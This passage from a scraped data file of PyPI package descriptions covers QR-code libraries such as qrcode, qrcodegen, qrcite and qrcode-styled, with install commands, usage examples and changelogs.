ofQRBill.as_svg()or the CLI argument--full-page.The vertical separation line between receipt and main part can be omitted\nthrough the--no-payment-lineCLI argument.A new--textcommand line parameter allows for a raw text output.Support for Alternate procedures lines was added (--alt-procsargument,\n#40).0.5 (2020-06-24)QRBill.as_svg()accepts now file-like objects.Added support for combined address format.A top separation line is now printed by default. It can be deactivated\nthrough thetop_lineboolean parameter ofQRBill.__init__().The error correction level of the QR code conforms now to the spec (M).0.4 (2020-02-24)Changes were not logged until version 0.4. Development stage was still alpha."} +{"package": "qrbsgen", "pacakge-description": "DescriptionA Python library for encoding Quantum Rule Based Systems (QRBS). Calculate the probabilities associated with forward chaining rule bases using quantum gates and circuits.qrbsgensupports rule bases involvingAND,OR, andNOToperators.Made possible with an integration toQiskitSDK.PrerequisitesFamiliarity withQiskitis useful - check it outhere.The specification and definition of the QRBS implemented here can be found in the followingpublicationby V. Bonillo et al. and the wider NExt ApplicationS of Quantum Computing, orNEASQCproject.Installationpip install qrbsgenUsageSee the usage steps below to get started:import qrbsgen as q\n\n# Instantiate your QuantumRuleBasedSystem\nrule_system = q.QuantumRuleBasedSystem()\n\n# Define and add rules using appropriate syntax (see below)\nrule = \"IF ((A) AND ((B) OR (C))) THEN (R)\"\nrule_terms, qubits = rule_system.add_rules([rule])\n\n# Perform quantum circuit\nrule_system.evaluate_rules(rule_terms, qubits)Given the two-level system representing true or false outcomes, the probability of the above test will be a probabilistic result like so:* Added rule IF ((A) AND ((B) OR (C))) THEN (R)\n* Probability of outcome: 0.378SyntaxCurrently, QRBS is limited to supporting inputs of two-level systems, as can be easily mapped to a two-level quantum system, or qubit.This means clauses, or variables, must be defined astrueorfalse,oneorzero. You can also define variables asAandNOT Afor simplicity.Please define rules and clauses as follows:Start with an\"IF\"statement in capital letters.Follow with the rule antecedent and antecedent clauses, where\"IS\"is typed in capital letters where relevant e.g.:A IS one,A IS true,(A is true),Aor(A).Follow with a\"THEN\"statement in capital letters.Finish with the rule consequet, where\"IS\"is typed in capital letters where relevant e.g.:B IS one,B IS true,(B is true),Bor(B).\"IF ((A IS true) AND ((B IS true) OR (C IS true))) THEN (R IS true)\"ExamplesExamples can be foundhere.InformationCreated by Kate Marshall of IBM.Although this is copyright of IBM, this is not an official or unofficial IBM product.\nPlease get in touch for any further information:kate.marshall@ibm.com.Inspiration for this repo and rule parsing techniques came from theSimpfulfuzzy reasoning API."} +{"package": "qrcard", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrc-build", "pacakge-description": "No description available on PyPI."} +{"package": "qrcericcommons", "pacakge-description": "qrcer_commonsCommon utils for python."} +{"package": "qrcgen", "pacakge-description": "UNKNOWN"} +{"package": "qrcite", "pacakge-description": "qrciteGenerate QR Codes from .bib-files or given dois.Example:Inspired byhttps://github.com/nucleic-acid/namedropR.Installationfrom pypihttps://pypi.org/project/qrcite/pip install qrcitefrom the git repositorypip install https://codeberg.org/Meph/qrciteUsage after installationqrcite input.bib\n\nqrcite -d \"\"\n\nqrcite --helpExamplesWith text, red backgroundqrcite inputfile.bib -c \"#900000\" -t pngQR Code only, as pdf, from doi onlypython -m qrcite -d \"10.5281/zenodo.7545620\" --color \"#070\" --style qrcode --type pdfCitationCite this project viahttps://doi.org/10.5281/zenodo.7545620:LicenseThis work is licensed under aCreative Commons Attribution-ShareAlike 4.0 International License.Follow me onMastodon."} +{"package": "qrcode", "pacakge-description": "Pure python QR Code generatorGenerate QR codes.A standard install usespypngto generate PNG files and can also render QR\ncodes directly to the console. A standard install is just:pip install qrcodeFor more image functionality, install qrcode with thepildependency so\nthatpillowis installed and can be used for generating images:pip install \"qrcode[pil]\"What is a QR Code?A Quick Response code is a two-dimensional pictographic code used for its fast\nreadability and comparatively large storage capacity. The code consists of\nblack modules arranged in a square pattern on a white background. The\ninformation encoded can be made up of any kind of data (e.g., binary,\nalphanumeric, or Kanji symbols)UsageFrom the command line, use the installedqrscript:qr \"Some text\" > test.pngOr in Python, use themakeshortcut function:importqrcodeimg=qrcode.make('Some data here')type(img)# qrcode.image.pil.PilImageimg.save(\"some_file.png\")Advanced UsageFor more control, use theQRCodeclass. For example:importqrcodeqr=qrcode.QRCode(version=1,error_correction=qrcode.constants.ERROR_CORRECT_L,box_size=10,border=4,)qr.add_data('Some data')qr.make(fit=True)img=qr.make_image(fill_color=\"black\",back_color=\"white\")Theversionparameter is an integer from 1 to 40 that controls the size of\nthe QR Code (the smallest, version 1, is a 21x21 matrix).\nSet toNoneand use thefitparameter when making the code to determine\nthis automatically.fill_colorandback_colorcan change the background and the painting\ncolor of the QR, when using the default image factory. Both parameters accept\nRGB color tuples.img=qr.make_image(back_color=(255,195,235),fill_color=(55,95,35))Theerror_correctionparameter controls the error correction used for the\nQR Code. The following four constants are made available on theqrcodepackage:ERROR_CORRECT_LAbout 7% or less errors can be corrected.ERROR_CORRECT_M(default)About 15% or less errors can be corrected.ERROR_CORRECT_QAbout 25% or less errors can be corrected.ERROR_CORRECT_H.About 30% or less errors can be corrected.Thebox_sizeparameter controls how many pixels each \u201cbox\u201d of the QR code\nis.Theborderparameter controls how many boxes thick the border should be\n(the default is 4, which is the minimum according to the specs).Other image factoriesYou can encode as SVG, or use a new pure Python image processor to encode to\nPNG images.The Python examples below use themakeshortcut. The sameimage_factorykeyword argument is a valid option for theQRCodeclass for more advanced\nusage.SVGYou can create the entire SVG or an SVG fragment. When building an entire SVG\nimage, you can use the factory that combines as a path (recommended, and\ndefault for the script) or a factory that creates a simple set of rectangles.From your command line:qr --factory=svg-path \"Some text\" > test.svg\nqr --factory=svg \"Some text\" > test.svg\nqr --factory=svg-fragment \"Some text\" > test.svgOr in Python:importqrcodeimportqrcode.image.svgifmethod=='basic':# Simple factory, just a set of rects.factory=qrcode.image.svg.SvgImageelifmethod=='fragment':# Fragment factory (also just a set of rects)factory=qrcode.image.svg.SvgFragmentImageelse:# Combined path factory, fixes white space that may occur when zoomingfactory=qrcode.image.svg.SvgPathImageimg=qrcode.make('Some data here',image_factory=factory)Two other related factories are available that work the same, but also fill the\nbackground of the SVG with white:qrcode.image.svg.SvgFillImage\nqrcode.image.svg.SvgPathFillImageTheQRCode.make_image()method forwards additional keyword arguments to the\nunderlying ElementTree XML library. This helps to fine tune the root element of\nthe resulting SVG:importqrcodeqr=qrcode.QRCode(image_factory=qrcode.image.svg.SvgPathImage)qr.add_data('Some data')qr.make(fit=True)img=qr.make_image(attrib={'class':'some-css-class'})You can convert the SVG image into strings using theto_string()method.\nAdditional keyword arguments are forwarded to ElementTreestostring():img.to_string(encoding='unicode')Pure Python PNGIf Pillow is not installed, the default image factory will be a pure Python PNG\nencoder that usespypng.You can use the factory explicitly from your command line:qr --factory=png \"Some text\" > test.pngOr in Python:importqrcodefromqrcode.image.pureimportPyPNGImageimg=qrcode.make('Some data here',image_factory=PyPNGImage)Styled ImageWorks only withversions>=7.2 (SVG styled images require 7.4).To apply styles to the QRCode, use theStyledPilImageor one of the\nstandardSVGimage factories. These accept an optionalmodule_drawerparameter to control the shape of the QR Code.These QR Codes are not guaranteed to work with all readers, so do some\nexperimentation and set the error correction to high (especially if embedding\nan image).Other PIL module drawers:For SVGs, useSvgSquareDrawer,SvgCircleDrawer,SvgPathSquareDrawer, orSvgPathCircleDrawer.These all accept asize_ratioargument which allows for \u201cgapped\u201d squares or\ncircles by reducing this less than the default ofDecimal(1).TheStyledPilImageadditionally accepts an optionalcolor_maskparameter to change the colors of the QR Code, and an optionalembeded_image_pathto embed an image in the center of the code.Other color masks:Here is a code example to draw a QR code with rounded corners, radial gradient\nand an embedded image:importqrcodefromqrcode.image.styledpilimportStyledPilImagefromqrcode.image.styles.moduledrawers.pilimportRoundedModuleDrawerfromqrcode.image.styles.colormasksimportRadialGradiantColorMaskqr=qrcode.QRCode(error_correction=qrcode.constants.ERROR_CORRECT_L)qr.add_data('Some data')img_1=qr.make_image(image_factory=StyledPilImage,module_drawer=RoundedModuleDrawer())img_2=qr.make_image(image_factory=StyledPilImage,color_mask=RadialGradiantColorMask())img_3=qr.make_image(image_factory=StyledPilImage,embeded_image_path=\"/path/to/image.png\")ExamplesGet the text content fromprint_ascii:importioimportqrcodeqr=qrcode.QRCode()qr.add_data(\"Some text\")f=io.StringIO()qr.print_ascii(out=f)f.seek(0)print(f.read())Theadd_datamethod will append data to the current QR object. To add new data by replacing previous content in the same object, first use clear method:importqrcodeqr=qrcode.QRCode()qr.add_data('Some data')img=qr.make_image()qr.clear()qr.add_data('New data')other_img=qr.make_image()Pipe ascii output to text file in command line:qr --ascii \"Some data\" > \"test.txt\"\ncat test.txtAlternative to piping output to file to avoid PowerShell issues:# qr \"Some data\" > test.png\nqr --output=test.png \"Some data\"Change log7.4.2 (6 February 2023)Allowpypngfactory to allow for saving to a string (likeqr.save(\"some_file.png\")) in addition to file-like objects.7.4.1 (3 February 2023)Fix bad over-optimization in v7.4 that broke large QR codes. Thanks to\nmattiasj-axis!7.4 (1 February 2023)Restructure the factory drawers, allowing different shapes in SVG image\nfactories as well.Add a--factory-draweroption to theqrconsole script.Optimize the output for theSVGPathImagefactory (more than 30% reduction\nin file sizes).Add apypngimage factory as a pure Python PNG solution. Ifpillowisnotinstalled, then this becomes the default factory.Thepymagingimage factory has been removed, but its factory shortcut and\nthe actual PymagingImage factory class now just link to the PyPNGImage\nfactory.7.3.1 (1 October 2021)Improvements for embedded image.7.3 (19 August 2021)Skip color mask if QR is black and white7.2 (19 July 2021)Add Styled PIL image factory, allowing different color masks and shapes in QR codesSmall performance inprovementAdd check for border size parameter7.1 (1 July 2021)Add \u2013ascii parameter to command line interface allowing to output ascii when stdout is pipedAdd \u2013output parameter to command line interface to specify output fileAccept RGB tuples in fill_color and back_colorAdd to_string method to SVG imagesReplace inline styles with SVG attributes to avoid CSP issuesAdd Python3.10 to supported versions7.0 (29 June 2021)Drop Python < 3.6 support.6.1 (14 January 2019)Fix short chunks of data not being optimized to the correct mode.Tests fixed for Python 36.0 (23 March 2018)Fix optimize length being ignored inQRCode.add_data.Better calculation of the best mask pattern and related optimizations. Big\nthanks to cryptogun!5.3 (18 May 2016)Fix incomplete block table for QR version 15. Thanks Rodrigo Queiro for the\nreport and Jacob Welsh for the investigation and fix.Avoid unnecessary dependency for non MS platforms, thanks to Noah Vesely.MakeBaseImage.get_image()actually work.5.2 (25 Jan 2016)Add--error-correctionoption to qr script.Fix script piping to stdout in Python 3 and reading non-UTF-8 characters in\nPython 3.Fix script piping in Windows.Add some useful behind-the-curtain methods for tinkerers.Fix terminal output when using Python 2.6Fix terminal output to display correctly on MS command line.5.2.1Small fix to terminal output in Python 3 (and fix tests)5.2.2Revert some terminal changes from 5.2 that broke Python 3\u2019s real life tty\ncode generation and introduce a better way from Jacob Welsh.5.1 (22 Oct 2014)Makeqrscript work in Windows. Thanks Ionel Cristian M\u0103rie\u0219Fixed print_ascii function in Python 3.Out-of-bounds code version numbers are handled more consistently with a\nValueError.Much better test coverage (now only officially supporting Python 2.6+)5.0 (17 Jun 2014)Speed optimizations.Change the output when using theqrscript to use ASCII rather than\njust colors, better using the terminal real estate.Fix a bug in passing bytecode data directly when in Python 3.Substation speed optimizations to best-fit algorithm (thanks Jacob Welsh!).Introduce aprint_asciimethod and use it as the default for theqrscript rather thanprint_tty.5.0.1Update version numbers correctly.4.0 (4 Sep 2013)Made qrcode work on Python 2.4 - Thanks tcely.\nNote: officially, qrcode only supports 2.5+.Support pure-python PNG generation (via pymaging) for Python 2.6+ \u2013 thanks\nAdam Wisniewski!SVG image generation now supports alternate sizing (the default box size of\n10 == 1mm per rectangle).SVG path image generation allows cleaner SVG output by combining all QR rects\ninto a single path. Thank you, Viktor St\u00edskala.Added some extra simple SVG factories that fill the background white.4.0.1Fix the pymaging backend not able to save the image to a buffer. Thanks ilj!4.0.2Fix incorrect regex causing a comma to be considered part of the alphanumeric\nset.Switch to using setuptools for setup.py.4.0.3Fix bad QR code generation due to the regex comma fix in version 4.0.2.4.0.4Bad version number for previous hotfix release.3.1 (12 Aug 2013)Important fixes for incorrect matches of the alphanumeric encoding mode.\nPreviously, the pattern would match if a single line was alphanumeric only\n(even if others wern\u2019t). Also, the two characters{and}had snuck\nin as valid characters. Thanks to Eran Tromer for the report and fix.Optimized chunking \u2013 if the parts of the data stream can be encoded more\nefficiently, the data will be split into chunks of the most efficient modes.3.1.1Update change log to contain version 3.1 changes. :PGive theqrscript an--optimizeargument to control the chunk\noptimization setting.3.0 (25 Jun 2013)Python 3 support.Add QRCode.get_matrix, an easy way to get the matrix array of a QR code\nincluding the border. Thanks Hugh Rawlinson.Add in a workaround so that Python 2.6 users can use SVG generation (they\nmust installlxml).Some initial tests! And tox support (pip install tox) for testing across\nPython platforms.2.7 (5 Mar 2013)Fix incorrect termination padding.2.6 (2 Apr 2013)Fix the first four columns incorrectly shifted by one. Thanks to Josep\nG\u00f3mez-Suay for the report and fix.Fix strings within 4 bits of the QR version limit being incorrectly\nterminated. Thanks to zhjie231 for the report.2.5 (12 Mar 2013)The PilImage wrapper is more transparent - you can use any methods or\nattributes available to the underlying PIL Image instance.Fixed the first column of the QR Code coming up empty! Thanks to BecoKo.2.5.1Fix installation error on Windows.2.4 (23 Apr 2012)Use a pluggable backend system for generating images, thanks to Branko \u010cibej!\nComes with PIL and SVG backends built in.2.4.1Fix a packaging issue2.4.2Added ashowmethod to the PIL image wrapper so therun_examplefunction actually works.2.3 (29 Jan 2012)When adding data, auto-select the more efficient encoding methods for numbers\nand alphanumeric data (KANJI still not supported).2.3.1Encode unicode to utf-8 bytestrings when adding data to a QRCode.2.2 (18 Jan 2012)Fixed tty output to work on both white and black backgrounds.Addedborderparameter to allow customizing of the number of boxes used to\ncreate the border of the QR code2.1 (17 Jan 2012)Added aqrscript which can be used to output a qr code to the tty using\nbackground colors, or to a file via a pipe."} +{"package": "qrcodeapi", "pacakge-description": "QRCodeAPIQRCodeAPI is a Python library designed to seamlessly interact with the QR code generation API\nfromqrcode.ness.su. Leveraging FastAPI and aiohttp, it provides a convenient and asynchronous\nexperience for generating QR codes.FeaturesSimplicity: Generate QR codes with a simple and intuitive interface.Customization: Fine-tune QR code parameters, including data encoding, border size, box size, and optional image\ninclusion.InstallationpipinstallqrcodeapiUsageimportasynciofromqrcodeapiimportQRCodeAPIasyncdefmain():# Create an instance of QRCodeAPIqrcode_api=QRCodeAPI()# Example: Generate a basic QR code and save it to a filedata=\"Hello, QR Code!\"filename=\"qrcode.png\"qr_code_image=awaitqrcode_api.create(data)withopen(filename,\"wb\")asf:f.write(qr_code_image)# Example: Generate a QR code with an image and save it to a filedata_with_image=\"Example Data\"image_url=\"https://example.com/logo.png\"filename_with_image=\"qrcode_with_image.png\"qr_code_image_with_image=awaitqrcode_api.create(data_with_image,border=5,box_size=40,image_url=image_url,image_round=20,image_padding=5,)withopen(filename_with_image,\"wb\")asf:f.write(qr_code_image_with_image)if__name__=='__main__':asyncio.run(main())LicensingQRCodeAPI is licensed under the MIT License. See theLICENSEfile for details."} +{"package": "qrcode-artistic", "pacakge-description": "ThisSegnoplugin converts a\n(Micro) QR Code to a Pillow Image or into a QR code with a background\nimage.This plugin is not required to write PNG, EPS or PDF files. Segno\u2019s native\nimplementations usually generate smaller files in less time.This plugin might be useful to modify the QR Codes (i.e. rotate or blur)\nor to save the QR codes in an image format which is not supported by Segno.Furthermore, QR codes can be created with a background image.Transparency is supported as wellUsepipto install from PyPI:$ pip install qrcode-artisticDocumentation:https://segno.readthedocs.io/en/latest/artistic-qrcodes.html"} +{"package": "qr-codec", "pacakge-description": "Encode and decode Quick Response codes."} +{"package": "qrcode-converter", "pacakge-description": "`````````````````Run it:.. code:: bash$ pip install qrcode-converter$ python app/run.py [inner_img_path] [content] [width] [height]Links`````* `website `_* `documentation `_"} +{"package": "qrcodecreator", "pacakge-description": "No description available on PyPI."} +{"package": "qrcodegen", "pacakge-description": "IntroductionThis project aims to be the best, clearest QR Code generator library. The primary goals are flexible options and absolute correctness. Secondary goals are compact implementation size and good documentation comments.Home page with live JavaScript demo, extensive descriptions, and competitor comparisons:https://www.nayuki.io/page/qr-code-generator-libraryFeaturesCore features:Significantly shorter code but more documentation comments compared to competing librariesSupports encoding all 40 versions (sizes) and all 4 error correction levels, as per the QR Code Model 2 standardOutput format: Raw modules/pixels of the QR symbolDetects finder-like penalty patterns more accurately than other implementationsEncodes numeric and special-alphanumeric text in less space than general textOpen-source code under the permissive MIT LicenseManual parameters:User can specify minimum and maximum version numbers allowed, then library will automatically choose smallest version in the range that fits the dataUser can specify mask pattern manually, otherwise library will automatically evaluate all 8 masks and select the optimal oneUser can specify absolute error correction level, or allow the library to boost it if it doesn\u2019t increase the version numberUser can create a list of data segments manually and add ECI segmentsMore information about QR Code technology and this library\u2019s design can be found on the project home page.Examplesfrom qrcodegen import *\n\n# Simple operation\nqr0 = QrCode.encode_text(\"Hello, world!\", QrCode.Ecc.MEDIUM)\nsvg = to_svg_str(qr0, 4) # See qrcodegen-demo\n\n# Manual operation\nsegs = QrSegment.make_segments(\"3141592653589793238462643383\")\nqr1 = QrCode.encode_segments(segs, QrCode.Ecc.HIGH, 5, 5, 2, False)\nfor y in range(qr1.get_size()):\n for x in range(qr1.get_size()):\n (... paint qr1.get_module(x, y) ...)More complete set of examples:https://github.com/nayuki/QR-Code-generator/blob/master/python/qrcodegen-demo.py."} +{"package": "qrcodegenerator", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qr-code-generator", "pacakge-description": "No description available on PyPI."} +{"package": "qr-code-generator-api", "pacakge-description": "python-qr-code-generator-apiA simple Python wrapper for the API of qr-code-generator.com, which is used to generate QR codes with certain design elements.Why this API wrapper?First of all, because I needed it and also because this API is not reallywell documented. This wrapper provides a quick and easy way to connect to the API and request images, with a minimal amount of coding or effort. Just import the module, write a couple lines of easily understandable code and start generating these amazing QR codes.Table of ContentsFeaturesConfigure to fit your own needsChange all possible QR code optionsAutomatically save QR codesUsageCommand Line InterfaceCLI ExampleUse it in your own codeExample of using it in your own codeAuthenticationEnvironment variablesHardcoded in your own codePresetsThe easiest codeLimitationsFeaturesConfigure to fit your own needsWhile we have the wrapper set up in a way that allows for quick usage of the API, we understand that sometimes you just need it to test an absurd scenario or that you want to change output folders. With the configuration file, you are the boss. Even better: you don't necessarily have to change the configuration file to work for you. If you want, you can just use code to update configuration variables and run a request. This way, your configuration is limited to your own code.Change all possible QR code optionsThis wrapper provides an easy way to update QR options. Just set the dictionary variable to a new value, and it will automatically be taken into account when generating a code.Automatically save QR codesThe wrapper takes the API response and automatically turns it into a saved image in the desired output location. Do we need to say more?UsageThe wrapper was developed with ease of use in mind. This means that one can either, directly call the module to perform a request, or code their own Python scripts and import the module.Command Line InterfaceTo perform a request via the command line, simply$ python3 qr_code_generatorwith flags to specify your needs. The following flags are supported:--token {api access token here} (short: -t)--load {path to yaml file to load settings from} (short: -l)--output {name for output file} (short: -o)--bulk {amount to bulk generate} (short: -b)--verbose (short -v)CLI ExampleThe following code will request 5 QR-codes for tokenapijob, with name:test-qr-and load a configuration file calledconfig.yaml. It will also log all events:$ python3 qr_code_generator --token apijob --output test-qr --bulk 5 --load config.yaml --verboseUse it in your own codeTo use the api and its settings in your code, import it with:from qr_code_generator import QrGeneratorThen create an instance of QrGenerator:api = QrGenerator()Adjust settings as you like by alteringapi.settingsandapi.options, and callapi.request()to request a QR code be generated by api.Example of using it in your own codeThe following code will request a QR-code for tokenapijob, with name:test-qr, but before that it will load a configuration file calledconfig.yaml. It will also make sure to log all events:fromqr_code_generatorimportQrGeneratorapi=QrGenerator('apijob')api.load('config.yaml')api.config['VERBOSE']=Trueapi.output_filename='test-qr'api.request()AuthenticationThere are three possible ways to authenticate with the API. Authentication is done on a token basis. A token can be generatedon this webpage. The three ways are (based from most safe to least safe, and thus least preferred):Environment variablesThe safest way to authenticate, is by using environment variables. This starts by exporting your access key to an environment variable with$ export ACCESS_TOKEN=. After this, feel free to create an instance of QrGenerator by just calling the class asapi = QrGenerator(). The token will automatically be fetched from the environment.Hardcoded in your own codeA little bit less safe, because what if you accidentally commit your code with the token in it, or what if someone finds a readable portion of your code? If you choose to go down this route, understand that there are certain risks involved, but it can be done. There are two ways to put the token in your own code.Either make sure you call the QrGenerator class with a token parameter, as such:api = QrGenerator(). This will fetch the token from your code and add it to the query.Or set it later in your code, by using the set function:QrGenerator.set('access-token', ).WhenQrGenerator.request()is called and the API token has not been set and the configuration file has not been altered, a custom Exception will be thrown:MissingRequiredParameterError. This is because the API will directly return an InvalidCredentialsError regardless. If the configuration file has been changed, you might encounter aInvalidCredentialsError. Either way, it will not work.PresetsNot everyone loves coding. We are currently moving more and more to a world in which nocode is the standard for big groups of people, there is a way to load settings from a yaml file to the api, without you having to do any coding. Copy the settings-template.yaml template in /templates/ to your main directory and make the necessary changes. You can change both values for options and config. They will be automatically loaded and generation will take place.You can load with the load flag (described above), but you can also call api.load(filename.yaml) to load it in your own code. This will even further reduce the amount of Python necessary to generate a QR code.The easiest codefromqr_code_generatorimportQrGeneratorapi=QrGenerator()api.load(file.yaml)api.request()LimitationsIt is currently not possible to generate bulk qr-codes in your own code, without creating your own loop. This is by design, since we want to give all users the opportunity to do with bulk generation what they wish to do. The simplest way to request 5 codes would be:fromqr_code_generatorimportQrGeneratorapi=QrGenerator()file='output-filename'foriinrange(1,6):api.output_filename=f'{file}-{i}'api.request()"} +{"package": "qrcode-img", "pacakge-description": "\u0413\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f QR Code \u043f\u043e \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0435https://pypi.org/project/qrcode-img/\u041f\u0440\u0438\u043c\u0435\u0440 \u0440\u0430\u0431\u043e\u0442\u044bfrom path import Path\nfrom qrcode_img import QRCode\n\ntext = 'Hello'\n\npath_to_download = Path().joinpath(\"example\", \"11.png\")\npath_to_save = Path().joinpath(\"example\", \"1example.png\")\n\n\nqrcode = QRCode(text)\n\nbyte_io = qrcode.gen_qr_code(path_to_download)\n\nprint(byte_io)\n\nqrcode.save_qr_code(path_to_save)"} +{"package": "qr-coder", "pacakge-description": "qrioA QR handling module for writing and reading QR.examplefromqrioimportencode,decodedata=\"hello world\"print(data==decode(encode(data.encode())).decode())"} +{"package": "qrcodes", "pacakge-description": "No description available on PyPI."} +{"package": "qrcode-song", "pacakge-description": "No description available on PyPI."} +{"package": "qrcode-styled", "pacakge-description": "WelcomeQRCode Styled[WIP]This is a python port for abrowser QRCode generatorbyDenys KozakThis project was initially created for internal use incifrazia.com.We do not intend to maintain this project for wide usage, but feel free to use it, share, edit or submit pull requests.FeaturesMultiple formats:SVG usingxmlsPNG/WEBP, etc. usingPillowMultiple styles:Extra rounded cornersRounded cornersStraightDottedCheck outour documentation.InstallingUsingPoetrypoetryaddqrcode-styledUsingPIPpipinstallqrcode-styledRequirementsPython>= 3.10Pillow>= 10.0qrcode>= 6.1lxml>= 8.2.0(optional, for SVG rendering)ExtrasKeywordDescriptionPackagessvgAllows you to generate SVGlxml >= 4.6.3SVGWEBp"} +{"package": "qrcodeT", "pacakge-description": "qrcodeTThis simple library generates text-based QR codes to be used directly in the console (terminal).Installationusing pip:pip install qrcodeTor directly from here:pip install git+git://github.com/Khalil-Youssefi/qrcodeT.git#egg=qrcodeTUsageYou can directly use this library to create a QR code from a text and directly print it on the console:import qrcodeT\nqrcodeT.qrcodeT('https://github.com/Khalil-Youssefi/qrcodeT')and the output will be:"} +{"package": "qrcode-term", "pacakge-description": "qrcode_termQR code generator for terminal outputScreenshotFrom a terminal:CLI> python src/qrcode_term/qrcode_term.py\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2588\u2588\u2588\u2580\u2580\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2588\u2588\n\u2588\u2588\u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2588\u2584\u2580\u2588 \u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2588\u2588\n\u2588\u2588\u2588 \u2588 \u2588 \u2588\u2588\u2588 \u2580\u2580\u2588 \u2588 \u2588 \u2588\u2588\u2588\n\u2588\u2588\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588 \u2588\u2580\u2588\u2580\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2588\u2588\n\u2588\u2588\u2588\u2580\u2588\u2588\u2580\u2588\u2580\u2580\u2588\u2580\u2588 \u2580\u2580\u2580\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2584\u2584 \u2584\u2580\u2584\u2580\u2580\u2580\u2584\u2584 \u2588\u2588\u2584 \u2584\u2580\u2580\u2584 \u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2584\u2588\u2588\u2580\u2584\u2580 \u2580\u2580\u2584\u2580\u2584\u2580 \u2584\u2588\u2584\u2584\u2588\u2588\u2588\n\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2584\u2588\u2580 \u2580\u2588\u2580\u2580\u2580\u2580 \u2580\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2584 \u2584\u2588\u2580\u2580\u2588\u2584\u2588\u2588\u2588\u2584\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588 \u2588 \u2588 \u2588\u2584 \u2580\u2588 \u2588\u2580\u2584 \u2584 \u2584 \u2588\u2588\u2588\n\u2588\u2588\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2580\u2588 \u2584\u2580\u2584\u2580\u2580\u2588\u2580\u2588\u2580\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\nHello world!\n\n> python src/qrcode_term/qrcode_term.py --data \"mydata\" -f5\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2584 \u2588 \u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2588 \u2588 \u2588\u2580\u2580\u2584\u2580\u2580\u2588 \u2588 \u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2580\u2584\u2580\u2584\u2580\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2580\u2588\u2580\u2588\u2580\u2588\u2580\u2588\u2588\u2580\u2588\u2588\u2580\u2588\u2588\u2588\u2580\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588 \u2580\u2580 \u2580\u2588 \u2588 \u2588 \u2580 \u2588 \u2580 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2584\u2588\u2584\u2580\u2584\u2580 \u2580\u2588\u2584 \u2584 \u2580 \u2584\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2584\u2584 \u2588\u2580\u2588\u2584\u2584\u2580\u2588\u2580 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2580\u2588 \u2588\u2580\u2588 \u2588\u2580\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2588 \u2588 \u2588\u2580\u2588\u2584 \u2588 \u2580 \u2580\u2584\u2580\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2580 \u2580 \u2584 \u2580 \u2580\u2580\u2588 